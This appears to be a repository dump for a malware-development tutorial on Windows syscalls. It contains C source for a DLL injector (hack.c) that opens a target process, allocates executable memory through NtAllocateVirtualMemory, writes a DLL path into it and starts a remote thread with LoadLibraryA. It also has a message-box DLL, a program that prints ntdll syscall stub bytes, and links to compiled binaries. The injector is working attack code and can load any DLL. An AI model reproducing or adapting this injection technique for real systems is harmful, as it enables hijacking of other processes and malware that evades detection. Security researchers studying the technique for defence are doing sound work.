├── evil.dll ├── hack.exe ├── hack2.exe ├── README.md ├── evil.c ├── hack2.c └── hack.c /evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2023-06-07-syscalls-1/HEAD/evil.dll -------------------------------------------------------------------------------- /hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2023-06-07-syscalls-1/HEAD/hack.exe -------------------------------------------------------------------------------- /hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2023-06-07-syscalls-1/HEAD/hack2.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 32. Syscalls - part 1. C++ malware implementation. 2 | 3 | Malware dev trick - part 32, intro to windows syscalls. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html](https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html) 6 | -------------------------------------------------------------------------------- /evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.c 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow-meow!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } -------------------------------------------------------------------------------- /hack2.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack2.c 3 | print syscall ID from stub 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html 6 | */ 7 | #include 8 | #include 9 | 10 | void printSyscallStub(char* funcName) { 11 | HMODULE ntdll = LoadLibraryExA("ntdll.dll", NULL, DONT_RESOLVE_DLL_REFERENCES); 12 | 13 | if (ntdll == NULL) { 14 | printf("failed to load ntdll.dll\n"); 15 | return; 16 | } 17 | 18 | FARPROC funcAddress = GetProcAddress(ntdll, funcName); 19 | 20 | if (funcAddress == NULL) { 21 | printf("failed to get address of %s\n", funcName); 22 | FreeLibrary(ntdll); 23 | return; 24 | } 25 | 26 | printf("address of %s: 0x%p\n", funcName, funcAddress); 27 | 28 | // print the first 23 bytes of the stub 29 | BYTE* bytes = (BYTE*)funcAddress; 30 | for (int i = 0; i < 23; i++) { 31 | printf("%02X ", bytes[i]); 32 | } 33 | printf("\n"); 34 | 35 | FreeLibrary(ntdll); 36 | } 37 | 38 | int main() { 39 | printSyscallStub("NtAllocateVirtualMemory"); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | classic DLL injection example 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #pragma comment(lib, "ntdll") 13 | 14 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)( 15 | HANDLE ProcessHandle, 16 | PVOID *BaseAddress, 17 | ULONG ZeroBits, 18 | PULONG RegionSize, 19 | ULONG AllocationType, 20 | ULONG Protect 21 | ); 22 | 23 | char evilDLL[] = "C:\\temp\\evil.dll"; 24 | unsigned int evilLen = sizeof(evilDLL) + 1; 25 | 26 | int main(int argc, char* argv[]) { 27 | HANDLE ph; // process handle 28 | HANDLE rt; // remote thread 29 | LPVOID rb; // remote buffer 30 | 31 | // handle to kernel32 and pass it to GetProcAddress 32 | HMODULE hKernel32 = GetModuleHandle("Kernel32"); 33 | HMODULE ntdll = GetModuleHandle("ntdll"); 34 | VOID *lb = GetProcAddress(hKernel32, "LoadLibraryA"); 35 | 36 | // parse process ID 37 | if ( atoi(argv[1]) == 0) { 38 | printf("PID not found :( exiting...\n"); 39 | return -1; 40 | } 41 | printf("PID: %i", atoi(argv[1])); 42 | ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); 43 | 44 | // allocate memory buffer for remote process 45 | // rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 46 | 47 | pNtAllocateVirtualMemory myNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(ntdll, "NtAllocateVirtualMemory"); 48 | 49 | // allocate memory buffer for remote process 50 | myNtAllocateVirtualMemory(ph, &rb, 0, (PULONG)&evilLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 51 | 52 | // "copy" evil DLL between processes 53 | WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL); 54 | 55 | // our process start new thread 56 | rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL); 57 | CloseHandle(ph); 58 | return 0; 59 | } 60 | --------------------------------------------------------------------------------